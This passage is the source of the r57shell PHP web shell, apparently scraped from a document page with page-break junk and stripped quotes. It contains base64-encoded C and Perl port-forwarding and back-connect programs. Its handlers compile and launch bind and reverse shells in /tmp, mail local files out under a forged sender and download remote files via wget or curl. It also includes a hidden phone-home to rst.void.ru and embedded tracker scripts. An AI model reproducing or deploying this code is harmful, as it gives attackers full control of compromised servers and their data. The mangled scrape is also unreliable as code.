KGFyZ3ZbM10pKSAmJg0KICAgICAgIShoID0gZ2V0aG9zdGJ5YWRkcigmYSwgNCwgQUZfSU5FVCkpKSB7DQ ogICAgcGVycm9yKGFyZ3ZbM10pOw0KICAfile:///C|/Documents%20and%20Settings/TALLES/Desktop/bun%20php/r57php-1231677414471772-2.txt[5/10/2012 11:12:28 AM]
  29. 29. gIHJldHVybiAyNTsNCiAgfQ0KICBvcG9ydCA9IGF0b2woYXJndlsyXSk7DQogIGxhZGRyLnNpbl9wb3J0ID0gaHR vbnMoKHVuc2lnbmVkIHNob3J0KS hhdG9sKGFyZ3ZbMV0pKSk7DQogIGlmICgobHNvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIEl QUFJPVE9fVENQKSkgPT0gLTEpIHsNC iAgICBwZXJyb3IoInNvY2tldCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBsYWRkci5zaW5fZmFtaWx5ID0ga HRvbnMoQUZfSU5FVCk7DQogIGxh ZGRyLnNpbl9hZGRyLnNfYWRkciA9IGh0b25sKDApOw0KICBpZiAoYmluZChsc29jaywgJmxhZGRyLCBzaXplb2 YobGFkZHIpKSkgew0KICAgIHBlcnJ vcigiYmluZCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBpZiAobGlzdGVuKGxzb2NrLCAxKSkgew0KICAgIH BlcnJvcigibGlzdGVuIik7DQogIC AgcmV0dXJuIDIwOw0KICB9DQogIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0gLTEpIHsNCiAgICBwZXJyb3IoImZv cmsiKTsNCiAgICByZXR1cm4gMjA7D QogIH0NCiAgaWYgKG5ieXQgPiAwKQ0KICAgIHJldHVybiAwOw0KICBzZXRzaWQoKTsNCiAgd2hpbGUgKChj c29jayA9IGFjY2VwdChsc29jaywgJmNh ZGRyLCAmY2FkZHJsZW4pKSAhPSAtMSkgew0KICAgIGNmaWxlID0gZmRvcGVuKGNzb2NrLCJyKyIpOw0KIC AgIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0 gLTEpIHsNCiAgICAgIGZwcmludGYoY2ZpbGUsICI1MDAgZm9yazogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7 DQogICAgICBzaHV0ZG93bihjc29jay wyKTsNCiAgICAgIGZjbG9zZShjZmlsZSk7DQogICAgICBjb250aW51ZTsNCiAgICB9DQogICAgaWYgKG5ieXQg PT0gMCkNCiAgICAgIGdvdG8gZ290c 29jazsNCiAgICBmY2xvc2UoY2ZpbGUpOw0KICAgIHdoaWxlICh3YWl0cGlkKC0xLCBOVUxMLCBXTk9IQU5H KSA+IDApOw0KICB9DQogIHJldHVybiAy MDsNCg0KIGdvdHNvY2s6DQogIGlmICgob3NvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQ UFJPVE9fVENQKSkgPT0gLTEpIHsNCiA gICBmcHJpbnRmKGNmaWxlLCAiNTAwIHNvY2tldDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ29 0byBxdWl0MTsNCiAgfQ0KICBvYWRkci 5zaW5fZmFtaWx5ID0gaC0+aF9hZGRydHlwZTsNCiAgb2FkZHIuc2luX3BvcnQgPSBodG9ucyhvcG9ydCk7DQogIG 1lbWNweSgmb2FkZHIuc2luX2FkZ HIsIGgtPmhfYWRkciwgaC0+aF9sZW5ndGgpOw0KICBpZiAoY29ubmVjdChvc29jaywgJm9hZGRyLCBzaXplb2Yob 2FkZHIpKSkgew0KICAgIGZwcmlu dGYoY2ZpbGUsICI1MDAgY29ubmVjdDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0 MTsNCiAgfQ0KICB3aGlsZSAoMSkgew0 KICAgIEZEX1pFUk8oJmZkc3IpOw0KICAgIEZEX1pFUk8oJmZkc2UpOw0KICAgIEZEX1NFVChjc29jaywmZmRz cik7DQogICAgRkRfU0VUKGNzb2NrLC ZmZHNlKTsNCiAgICBGRF9TRVQob3NvY2ssJmZkc3IpOw0KICAgIEZEX1NFVChvc29jaywmZmRzZSk7DQogIC AgaWYgKHNlbGVjdCgyMCwgJmZkc3IsI E5VTEwsICZmZHNlLCBOVUxMKSA9PSAtMSkgew0KICAgICAgZnByaW50ZihjZmlsZSwgIjUwMCBzZWxlY3Q 6ICVzXG4iLCBzdHJlcnJvcihlcnJubykp Ow0KICAgICAgZ290byBxdWl0MjsNCiAgICB9DQogICAgaWYgKEZEX0lTU0VUKGNzb2NrLCZmZHNyKSB8fC BGRF9JU1NFVChjc29jaywmZmRzZSkpIHs NCiAgICAgIGlmICgobmJ5dCA9IHJlYWQoY3NvY2ssYnVmLDQwOTYpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7 DQogICAgICBpZiAoKHdyaXRlKG9zb2NrLG J1ZixuYnl0KSkgPD0gMCkNCglnb3RvIHF1aXQyOw0KICAgIH0gZWxzZSBpZiAoRkRfSVNTRVQob3NvY2ssJmZ kc3IpIHx8IEZEX0lTU0VUKG9zb2NrL CZmZHNlKSkgew0KICAgICAgaWYgKChuYnl0ID0gcmVhZChvc29jayxidWYsNDA5NikpIDw9IDApDQoJZ290by BxdWl0MjsNCiAgICAgIGlmICgod3Jp dGUoY3NvY2ssYnVmLG5ieXQpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgfQ0KICB9DQoNCiBxdWl0M joNCiAgc2h1dGRvd24ob3NvY2ssMik7DQo gIGNsb3NlKG9zb2NrKTsNCiBxdWl0MToNCiAgZmZsdXNoKGNmaWxlKTsNCiAgc2h1dGRvd24oY3NvY2ssMik7 DQogcXVpdDA6DQogIGZjbG9zZShjZm lsZSk7DQogIHJldHVybiAwOw0KfQ=="; $datapipe_pl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgSU86OlNvY2tldDsNCnVzZSBQT1NJWDsNCiRsb2NhbHBvcnQ gPSAkQVJHVlswXTsNCiRob3N0I CAgICAgPSAkQVJHVlsxXTsNCiRwb3J0ICAgICAgPSAkQVJHVlsyXTsNCiRkYWVtb249MTsNCiRESVIgPSB1bfile:///C|/Documents%20and%20Settings/TALLES/Desktop/bun%20php/r57php-1231677414471772-2.txt[5/10/2012 11:12:28 AM]
  30. 30. mRlZjsNCiR8ID0gMTsNCmlmICgkZGFl bW9uKXsgJHBpZCA9IGZvcms7IGV4aXQgaWYgJHBpZDsgZGllICIkISIgdW5sZXNzIGRlZmluZWQoJHBpZCk7IF BPU0lYOjpzZXRzaWQoKSBvciBkaWU gIiQhIjsgfQ0KJW8gPSAoJ3BvcnQnID0+ICRsb2NhbHBvcnQsJ3RvcG9ydCcgPT4gJHBvcnQsJ3RvaG9zdCcgPT4gJG hvc3QpOw0KJGFoID0gSU86Ol NvY2tldDo6SU5FVC0+bmV3KCdMb2NhbFBvcnQnID0+ICRsb2NhbHBvcnQsJ1JldXNlJyA9PiAxLCdMaXN0ZW4n ID0+IDEwKSB8fCBkaWUgIiQhIjsNC iRTSUd7J0NITEQnfSA9ICdJR05PUkUnOw0KJG51bSA9IDA7DQp3aGlsZSAoMSkgeyANCiRjaCA9ICRhaC0+YW NjZXB0KCk7IGlmICghJGNoKSB7IHBy aW50IFNUREVSUiAiJCFcbiI7IG5leHQ7IH0NCisrJG51bTsNCiRwaWQgPSBmb3JrKCk7DQppZiAoIWRlZmluZW QoJHBpZCkpIHsgcHJpbnQgU1RERVJ SICIkIVxuIjsgfSANCmVsc2lmICgkcGlkID09IDApIHsgJGFoLT5jbG9zZSgpOyBSdW4oXCVvLCAkY2gsICRudW0p OyB9IA0KZWxzZSB7ICRjaC0+Y2 xvc2UoKTsgfQ0KfQ0Kc3ViIFJ1biB7DQpteSgkbywgJGNoLCAkbnVtKSA9IEBfOw0KbXkgJHRoID0gSU86OlNvY2 tldDo6SU5FVC0+bmV3KCdQZWVyQ WRkcicgPT4gJG8tPnsndG9ob3N0J30sJ1BlZXJQb3J0JyA9PiAkby0+eyd0b3BvcnQnfSk7DQppZiAoISR0aCkgeyBle Gl0IDA7IH0NCm15ICRmaDsN CmlmICgkby0+eydkaXInfSkgeyAkZmggPSBTeW1ib2w6OmdlbnN5bSgpOyBvcGVuKCRmaCwgIj4kby0+eydkaXInf S90dW5uZWwkbnVtLmxvZyIpIG9 yIGRpZSAiJCEiOyB9DQokY2gtPmF1dG9mbHVzaCgpOw0KJHRoLT5hdXRvZmx1c2goKTsNCndoaWxlICgkY2ggf HwgJHRoKSB7DQpteSAkcmluID0gIi I7DQp2ZWMoJHJpbiwgZmlsZW5vKCRjaCksIDEpID0gMSBpZiAkY2g7DQp2ZWMoJHJpbiwgZmlsZW5vKCR0aC ksIDEpID0gMSBpZiAkdGg7DQpteSgkc m91dCwgJGVvdXQpOw0Kc2VsZWN0KCRyb3V0ID0gJHJpbiwgdW5kZWYsICRlb3V0ID0gJHJpbiwgMTIwKTsNC mlmICghJHJvdXQgICYmICAhJGVvdXQp IHt9DQpteSAkY2J1ZmZlciA9ICIiOw0KbXkgJHRidWZmZXIgPSAiIjsNCmlmICgkY2ggJiYgKHZlYygkZW91dCwg ZmlsZW5vKCRjaCksIDEpIHx8IHZ lYygkcm91dCwgZmlsZW5vKCRjaCksIDEpKSkgew0KbXkgJHJlc3VsdCA9IHN5c3JlYWQoJGNoLCAkdGJ1ZmZlci wgMTAyNCk7DQppZiAoIWRlZmluZW QoJHJlc3VsdCkpIHsNCnByaW50IFNUREVSUiAiJCFcbiI7DQpleGl0IDA7DQp9DQppZiAoJHJlc3VsdCA9PSAwKS B7IGV4aXQgMDsgfQ0KfQ0KaWYgK CR0aCAgJiYgICh2ZWMoJGVvdXQsIGZpbGVubygkdGgpLCAxKSAgfHwgdmVjKCRyb3V0LCBmaWxlbm8oJHRo KSwgMSkpKSB7DQpteSAkcmVzdWx0ID0g c3lzcmVhZCgkdGgsICRjYnVmZmVyLCAxMDI0KTsNCmlmICghZGVmaW5lZCgkcmVzdWx0KSkgeyBwcmludCB TVERFUlIgIiQhXG4iOyBleGl0IDA7IH0 NCmlmICgkcmVzdWx0ID09IDApIHtleGl0IDA7fQ0KfQ0KaWYgKCRmaCAgJiYgICR0YnVmZmVyKSB7KHBya W50ICRmaCAkdGJ1ZmZlcik7fQ0Kd2hpbG UgKG15ICRsZW4gPSBsZW5ndGgoJHRidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJHRoLCAkdGJ1Zm ZlciwgJGxlbik7DQppZiAoJHJlcyA+I DApIHskdGJ1ZmZlciA9IHN1YnN0cigkdGJ1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbi I7fQ0KfQ0Kd2hpbGUgKG15ICRs ZW4gPSBsZW5ndGgoJGNidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJGNoLCAkY2J1ZmZlciwgJGxlbik 7DQppZiAoJHJlcyA+IDApIHskY2J 1ZmZlciA9IHN1YnN0cigkY2J1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfX19 DQo="; $c1 = "PHNjcmlwdCBsYW5ndWFnZT0iamF2YXNjcmlwdCI+aG90bG9nX2pzPSIxLjAiO2hvdGxvZ19yPSIiK01hdGgucmF uZG9tKCkrIiZzPTgxNjA2 JmltPTEmcj0iK2VzY2FwZShkb2N1bWVudC5yZWZlcnJlcikrIiZwZz0iK2VzY2FwZSh3aW5kb3cubG9jYXRpb24ua HJlZik7ZG9jdW1lbnQuY29va2l lPSJob3Rsb2c9MTsgcGF0aD0vIjsgaG90bG9nX3IrPSImYz0iKyhkb2N1bWVudC5jb29raWU/IlkiOiJOIik7PC9zY3Jpc HQ+PHNjcmlwdCBsYW5ndW FnZT0iamF2YXNjcmlwdDEuMSI+aG90bG9nX2pzPSIxLjEiO2hvdGxvZ19yKz0iJmo9IisobmF2aWdhdG9yLmphdmF FbmFibGVkKCk/IlkiOiJOIik8Lfile:///C|/Documents%20and%20Settings/TALLES/Desktop/bun%20php/r57php-1231677414471772-2.txt[5/10/2012 11:12:28 AM]
  31. 31. 3NjcmlwdD48c2NyaXB0IGxhbmd1YWdlPSJqYXZhc2NyaXB0MS4yIj5ob3Rsb2dfanM9IjEuMiI7aG90bG9nX3IrPSI md2g9IitzY3JlZW4ud2lkdGgr J3gnK3NjcmVlbi5oZWlnaHQrIiZweD0iKygoKG5hdmlnYXRvci5hcHBOYW1lLnN1YnN0cmluZygwLDMpPT0iTWl jIikpP3NjcmVlbi5jb2xvckRlcHR oOnNjcmVlbi5waXhlbERlcHRoKTwvc2NyaXB0PjxzY3JpcHQgbGFuZ3VhZ2U9ImphdmFzY3JpcHQxLjMiPmhvdG xvZ19qcz0iMS4zIjwvc2NyaXB0Pj xzY3JpcHQgbGFuZ3VhZ2U9ImphdmFzY3JpcHQiPmhvdGxvZ19yKz0iJmpzPSIraG90bG9nX2pzO2RvY3VtZW50L ndyaXRlKCI8YSBocmVmPSdodHRwO i8vY2xpY2suaG90bG9nLnJ1Lz84MTYwNicgdGFyZ2V0PSdfdG9wJz48aW1nICIrIiBzcmM9J2h0dHA6Ly9oaXQ0L mhvdGxvZy5ydS9jZ2ktYmluL2hv dGxvZy9jb3VudD8iK2hvdGxvZ19yKyImJyBib3JkZXI9MCB3aWR0aD0xIGhlaWdodD0xIGFsdD0xPjwvYT4iKTwv c2NyaXB0Pjxub3NjcmlwdD48YSB ocmVmPWh0dHA6Ly9jbGljay5ob3Rsb2cucnUvPzgxNjA2IHRhcmdldD1fdG9wPjxpbWdzcmM9Imh0dHA6Ly9oaXQ 0LmhvdGxvZy5ydS9jZ2ktYmluL2 hvdGxvZy9jb3VudD9zPTgxNjA2JmltPTEiIGJvcmRlcj0wd2lkdGg9IjEiIGhlaWdodD0iMSIgYWx0PSJIb3RMb2ciPjw vYT48L25vc2NyaXB0Pg=="; $c2 = "PCEtLUxpdmVJbnRlcm5ldCBjb3VudGVyLS0+PHNjcmlwdCBsYW5ndWFnZT0iSmF2YVNjcmlwdCI+PCEtLQ0K ZG9jdW1lbnQud3JpdGUoJzxh IGhyZWY9Imh0dHA6Ly93d3cubGl2ZWludGVybmV0LnJ1L2NsaWNrIiAnKw0KJ3RhcmdldD1fYmxhbms+PGltZy BzcmM9Imh0dHA6Ly9jb3VudGVyLnl hZHJvLnJ1L2hpdD90NTIuNjtyJysNCmVzY2FwZShkb2N1bWVudC5yZWZlcnJlcikrKCh0eXBlb2Yoc2NyZWVuKT 09J3VuZGVmaW5lZCcpPycnOg0KJz tzJytzY3JlZW4ud2lkdGgrJyonK3NjcmVlbi5oZWlnaHQrJyonKyhzY3JlZW4uY29sb3JEZXB0aD8NCnNjcmVlbi5jb2x vckRlcHRoOnNjcmVlbi5wa XhlbERlcHRoKSkrJzsnK01hdGgucmFuZG9tKCkrDQonIiBhbHQ9ImxpdmVpbnRlcm5ldC5ydTog7+7q4Ofg7e4g9+jx 6+4g7/Du8ezu8vDu4iDoIO/u 8eXy6PLl6+XpIOfgIDI0IPfg8eAiICcrDQonYm9yZGVyPTAgd2lkdGg9MCBoZWlnaHQ9MD48L2E+JykvLy0tPjwvc 2NyaXB0PjwhLS0vTGl2ZUludGV ybmV0LS0+"; if($unix) { if(!isset($_COOKIE[uname])) { $uname = ex(uname -a); setcookie(uname,$uname); } else { $uname = $_COOKIE[uname]; } if(!isset($_COOKIE[id])) { $id = ex(id); setcookie(id,$id); } else { $id = $_COOKIE[id]; } if($safe_mode) { $sysctl = -; } else if(isset($_COOKIE[sysctl])) { $sysctl = $_COOKIE[sysctl]; } else { $sysctl = ex(sysctl -n kern.ostype && sysctl -n kern.osrelease); if(empty($sysctl)) { $sysctl = ex(sysctl -n kernel.ostype && sysctl -n kernel.osrelease); } if(empty($sysctl)) { $sysctl = -; } setcookie(sysctl,$sysctl); } } echo $head; echo </head>; if(empty($_POST[cmd])) { $serv = array(127,192,172,10); $addr=@explode(., $_SERVER[SERVER_ADDR]); $current_version = str_replace(.,,$version); if (!in_array($addr[0], $serv)) { @print "<img src="http://rst.void.ru/r57shell_version/version.php?img=1&version=".$current_version."" border=0 height=0 width=0>";file:///C|/Documents%20and%20Settings/TALLES/Desktop/bun%20php/r57php-1231677414471772-2.txt[5/10/2012 11:12:28 AM]
  32. 32. @readfile ("http://rst.void.ru/r57shell_version/version.php?version=".$current_version."");}} echo <body><table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc width=160><font face=Verdana size=2>.ws(2).<font face=Webdings size=6><b>!</b></font><b>.ws(2).r57shell .$version.</b></font></td><td bgcolor=#cccccc><font face=Verdana size=-2>; echo ws(2)."<b>".date ("d-m-Y H:i:s")."</b>"; echo ws(2).$lb." <a href=".$_SERVER[PHP_SELF]."?phpinfo title="".$lang[$language._text46].""><b>phpinfo</b></a> ".$rb; echo ws(2).$lb." <a href=".$_SERVER[PHP_SELF]."?phpini title="".$lang[$language._text47].""><b>php.ini</b></a> ".$rb; if($unix) { echo ws(2).$lb." <a href=".$_SERVER[PHP_SELF]."?cpu title="".$lang[$language._text50].""><b>cpu</b></a> ".$rb; echo ws(2).$lb." <a href=".$_SERVER[PHP_SELF]."?mem title="".$lang[$language._text51].""><b>mem</b></a> ".$rb; echo ws(2).$lb." <a href=".$_SERVER[PHP_SELF]."?users title="".$lang[$language._text95].""><b>users</b></a> ".$rb; } echo ws(2).$lb." <a href=".$_SERVER[PHP_SELF]."?tmp title="".$lang[$language._text48].""><b>tmp</b></a> ".$rb; echo ws(2).$lb." <a href=".$_SERVER[PHP_SELF]."?delete title="".$lang[$language._text49].""><b>delete</b></a> ".$rb."<br>"; echo ws(2)."safe_mode: <b>"; echo (($safe_mode)?("<font color=green>ON</font>"):("<font color=red>OFF</font>")); echo "</b>".ws(2); echo "PHP version: <b>".@phpversion()."</b>"; $curl_on = @function_exists(curl_version); echo ws(2); echo "cURL: <b>".(($curl_on)?("<font color=green>ON</font>"):("<font color=red>OFF</font>")); echo "</b>".ws(2); echo "MySQL: <b>"; $mysql_on = @function_exists(mysql_connect); if($mysql_on){ echo "<font color=green>ON</font>"; } else { echo "<font color=red>OFF</font>"; } echo "</b>".ws(2); echo "MSSQL: <b>"; $mssql_on = @function_exists(mssql_connect); if($mssql_on){echo "<font color=green>ON</font>";}else{echo "<font color=red>OFF</font>";} echo "</b>".ws(2); echo "PostgreSQL: <b>"; $pg_on = @function_exists(pg_connect); if($pg_on){echo "<font color=green>ON</font>";}else{echo "<font color=red>OFF</font>";} echo "</b>".ws(2); echo "Oracle: <b>"; $ora_on = @function_exists(ocilogon); if($ora_on){echo "<font color=green>ON</font>";}else{echo "<font color=red>OFF</font>";} echo "</b><br>".ws(2); echo "Disable functions : <b>"; if(==($df=@ini_get(disable_functions))){echo "<font color=green>NONE</font></b>";}else{echo "<font color=red>$df</font></b>";} $free = @diskfreespace($dir); if (!$free) {$free = 0;} $all = @disk_total_space($dir); if (!$all) {$all = 0;}file:///C|/Documents%20and%20Settings/TALLES/Desktop/bun%20php/r57php-1231677414471772-2.txt[5/10/2012 11:12:28 AM]
  33. 33. echo "<br>".ws(2)."Free space : <b>".view_size($free)."</b> Total space: <b>".view_size($all)."</b>"; echo </font></td></tr><table> <table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000> <tr><td align=right width=100>; echo $font; if($unix){ echo <font color=blue><b>uname -a :.ws(1).<br>sysctl :.ws(1).<br>$OSTYPE :.ws(1).<br>Server :.ws(1).<br>id :.ws(1).<br>pwd :.ws(1).</b></font><br>; echo "</td><td>"; echo "<font face=Verdana size=-2 color=red><b>"; echo((!empty($uname))?(ws(3).@substr($uname,0,120)."<br>"):(ws(3).@substr(@php_uname(),0,120)."<br>")); echo ws(3).$sysctl."<br>"; echo ws(3).ex(echo $OSTYPE)."<br>"; echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>"; if(!empty($id)) { echo ws(3).$id."<br>"; } else if(function_exists(posix_geteuid) && function_exists(posix_getegid) && function_exists(posix_getgrgid) && function_exists(posix_getpwuid)) { $euserinfo = @posix_getpwuid(@posix_geteuid()); $egroupinfo = @posix_getgrgid(@posix_getegid()); echo ws(3).uid=.$euserinfo[uid]. ( .$euserinfo[name]. ) gid=.$egroupinfo[gid]. ( .$egroupinfo[name]. )<br>; } else echo ws(3)."user=".@get_current_user()." uid=".@getmyuid()." gid=".@getmygid()."<br>"; echo ws(3).$dir; echo ws(3).( .perms(@fileperms($dir)). ); echo "</b></font>"; } else { echo <font color=blue><b>OS :.ws(1).<br>Server :.ws(1).<br>User :.ws(1).<br>pwd :.ws(1).</b></font><br>; echo "</td><td>"; echo "<font face=Verdana size=-2 color=red><b>"; echo ws(3).@substr(@php_uname(),0,120)."<br>"; echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>"; echo ws(3).@getenv("USERNAME")."<br>"; echo ws(3).$dir; echo "<br></font>"; } echo "</font>"; echo "</td></tr></table>"; if(empty($c1)||empty($c2)) { die(); } $f = <br>; $f .= base64_decode($c1); $f .= base64_decode($c2); if(!empty($_POST[cmd]) && $_POST[cmd]=="mail") { $res = mail($_POST[to],$_POST[subj],$_POST[text],"From: ".$_POST[from]."rn"); err(6+$res); $_POST[cmd]=""; } if(!empty($_POST[cmd]) && $_POST[cmd]=="mail_file" && !empty($_POST[loc_file])) { if(!$file=@fopen($_POST[loc_file],"r")) { err(1,$_POST[loc_file]); $_POST[cmd]=""; } elsefile:///C|/Documents%20and%20Settings/TALLES/Desktop/bun%20php/r57php-1231677414471772-2.txt[5/10/2012 11:12:28 AM]
  34. 34. { $filename = @basename($_POST[loc_file]); $filedump = @fread($file,@filesize($_POST[loc_file])); fclose($file); $content_encoding=$mime_type=; compress($filename,$filedump,$_POST[compress]); $attach = array( "name"=>$filename, "type"=>$mime_type, "content"=>$filedump ); if(empty($_POST[subj])) { $_POST[subj] = file from r57shell; } if(empty($_POST[from])) { $_POST[from] = billy@microsoft.com; } $res = mailattach($_POST[to],$_POST[from],$_POST[subj],$attach); err(6+$res); $_POST[cmd]=""; } } if(!empty($_POST[cmd]) && $_POST[cmd] == "find_text") { $_POST[cmd] = find .$_POST[s_dir]. -name .$_POST[s_mask]. | xargs grep -E .$_POST[s_text].; } if(!empty($_POST[cmd]) && $_POST[cmd]=="ch_") { switch($_POST[what]) { case own: @chown($_POST[param1],$_POST[param2]); break; case grp: @chgrp($_POST[param1],$_POST[param2]); break; case mod: @chmod($_POST[param1],intval($_POST[param2], 8)); break; } $_POST[cmd]=""; } if(!empty($_POST[cmd]) && $_POST[cmd]=="mk") { switch($_POST[what]) { case file: if($_POST[action] == "create") { if(file_exists($_POST[mk_name]) || !$file=@fopen($_POST[mk_name],"w")) { err(2,$_POST[mk_name]); $_POST[cmd]=""; } else { fclose($file); $_POST[e_name] = $_POST[mk_name]; $_POST[cmd]="edit_file"; echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language._text61]."</b></font></div></td></tr></table>"; }file:///C|/Documents%20and%20Settings/TALLES/Desktop/bun%20php/r57php-1231677414471772-2.txt[5/10/2012 11:12:28 AM]
  35. 35. } else if($_POST[action] == "delete") { if(unlink($_POST[mk_name])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=- 2><b>".$lang[$language._text63]."</b></font></div></td></tr></table>"; $_POST[cmd]=""; } break; case dir: if($_POST[action] == "create"){ if(mkdir($_POST[mk_name])) { $_POST[cmd]=""; echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language._text62]."</b></font></div></td></tr></table>"; } else { err(2,$_POST[mk_name]); $_POST[cmd]=""; } } else if($_POST[action] == "delete"){ if(rmdir($_POST[mk_name])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=- 2><b>".$lang[$language._text64]."</b></font></div></td></tr></table>"; $_POST[cmd]=""; } break; } } if(!empty($_POST[cmd]) && $_POST[cmd]=="edit_file" && !empty($_POST[e_name])) { if(!$file=@fopen($_POST[e_name],"r+")) { $only_read = 1; @fclose($file); } if(!$file=@fopen($_POST[e_name],"r")) { err(1,$_POST[e_name]); $_POST[cmd]=""; } else { echo $table_up3; echo $font; echo "<form name=save_file method=post>"; echo ws(3)."<b>".$_POST[e_name]."</b>"; echo "<div align=center><textarea name=e_text cols=121 rows=24>"; echo @htmlspecialchars(@fread($file,@filesize($_POST[e_name]))); fclose($file); echo "</textarea>"; echo "<input type=hidden name=e_name value=".$_POST[e_name].">"; echo "<input type=hidden name=dir value=".$dir.">"; echo "<input type=hidden name=cmd value=save_file>"; echo (!empty($only_read)?("<br><br>".$lang[$language._text44]):("<br><br><input type=submit name=submit value=" ".$lang[$language._butt10]." ">")); echo "</div>"; echo "</font>"; echo "</form>"; echo "</td></tr></table>"; exit(); } } if(!empty($_POST[cmd]) && $_POST[cmd]=="save_file")file:///C|/Documents%20and%20Settings/TALLES/Desktop/bun%20php/r57php-1231677414471772-2.txt[5/10/2012 11:12:28 AM]
  36. 36. { $mtime = @filemtime($_POST[e_name]); if(!$file=@fopen($_POST[e_name],"w")) { err(0,$_POST[e_name]); } else { if($unix) $_POST[e_text]=@str_replace("rn","n",$_POST[e_text]); @fwrite($file,$_POST[e_text]); @touch($_POST[e_name],$mtime,$mtime); $_POST[cmd]=""; echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language._text45]."</b></font></div></td></tr></table>"; } } if (!empty($_POST[port])&&!empty($_POST[bind_pass])&&($_POST[use]=="C")) { cf("/tmp/bd.c",$port_bind_bd_c); $blah = ex("gcc -o /tmp/bd /tmp/bd.c"); @unlink("/tmp/bd.c"); $blah = ex("/tmp/bd ".$_POST[port]." ".$_POST[bind_pass]." &"); $_POST[cmd]="ps -aux | grep bd"; } if (!empty($_POST[port])&&!empty($_POST[bind_pass])&&($_POST[use]=="Perl")) { cf("/tmp/bdpl",$port_bind_bd_pl); $p2=which("perl"); $blah = ex($p2." /tmp/bdpl ".$_POST[port]." &"); $_POST[cmd]="ps -aux | grep bdpl"; } if (!empty($_POST[ip]) && !empty($_POST[port]) && ($_POST[use]=="Perl")) { cf("/tmp/back",$back_connect); $p2=which("perl"); $blah = ex($p2." /tmp/back ".$_POST[ip]." ".$_POST[port]." &"); $_POST[cmd]="echo "Now script try connect to ".$_POST[ip]." port ".$_POST[port]." ...""; } if (!empty($_POST[ip]) && !empty($_POST[port]) && ($_POST[use]=="C")) { cf("/tmp/back.c",$back_connect_c); $blah = ex("gcc -o /tmp/backc /tmp/back.c"); @unlink("/tmp/back.c"); $blah = ex("/tmp/backc ".$_POST[ip]." ".$_POST[port]." &"); $_POST[cmd]="echo "Now script try connect to ".$_POST[ip]." port ".$_POST[port]." ...""; } if (!empty($_POST[local_port]) && !empty($_POST[remote_host]) && !empty($_POST[remote_port]) && ($_POST[use]=="Perl")) { cf("/tmp/dp",$datapipe_pl); $p2=which("perl"); $blah = ex($p2." /tmp/dp ".$_POST[local_port]." ".$_POST[remote_host]." ".$_POST[remote_port]." &"); $_POST[cmd]="ps -aux | grep dp"; } if (!empty($_POST[local_port]) && !empty($_POST[remote_host]) && !empty($_POST[remote_port]) && ($_POST[use]=="C")) { cf("/tmp/dpc.c",$datapipe_c);file:///C|/Documents%20and%20Settings/TALLES/Desktop/bun%20php/r57php-1231677414471772-2.txt[5/10/2012 11:12:28 AM]
  37. 37. $blah = ex("gcc -o /tmp/dpc /tmp/dpc.c"); @unlink("/tmp/dpc.c"); $blah = ex("/tmp/dpc ".$_POST[local_port]." ".$_POST[remote_port]." ".$_POST[remote_host]." &"); $_POST[cmd]="ps -aux | grep dpc"; } if (!empty($_POST[alias]) && isset($aliases[$_POST[alias]])) { $_POST[cmd] = $aliases[$_POST[alias]]; } if (!empty($HTTP_POST_FILES[userfile][name])) { if(!empty($_POST[new_name])) { $nfn = $_POST[new_name]; } else { $nfn = $HTTP_POST_FILES[userfile][name]; } @copy($HTTP_POST_FILES[userfile][tmp_name], $_POST[dir]."/".$nfn) or print("<font color=red face=Fixedsys><div align=center>Error uploading file ".$HTTP_POST_FILES[userfile][name]."</div></font>"); } if (!empty($_POST[with]) && !empty($_POST[rem_file]) && !empty($_POST[loc_file])) { switch($_POST[with]) { case wget: $_POST[cmd] = which(wget)." ".$_POST[rem_file]." -O ".$_POST[loc_file].""; break; case fetch: $_POST[cmd] = which(fetch)." -o ".$_POST[loc_file]." -p ".$_POST[rem_file].""; break; case lynx: $_POST[cmd] = which(lynx)." -source ".$_POST[rem_file]." > ".$_POST[loc_file].""; break; case links: $_POST[cmd] = which(links)." -source ".$_POST[rem_file]." > ".$_POST[loc_file].""; break; case GET: $_POST[cmd] = which(GET)." ".$_POST[rem_file]." > ".$_POST[loc_file].""; break; case curl: $_POST[cmd] = which(curl)." ".$_POST[rem_file]." -o ".$_POST[loc_file].""; break; } } if(!empty($_POST[cmd]) && ($_POST[cmd]=="ftp_file_up" || $_POST[cmd]=="ftp_file_down")) { list($ftp_server,$ftp_port) = split(":",$_POST[ftp_server_port]); if(empty($ftp_port)) { $ftp_port = 21; } $connection = @ftp_connect ($ftp_server,$ftp_port,10); if(!$connection) { err(3); } else { if(!@ftp_login($connection,$_POST[ftp_login],$_POST[ftp_password])) { err(4); } else { if($_POST[cmd]=="ftp_file_down") { 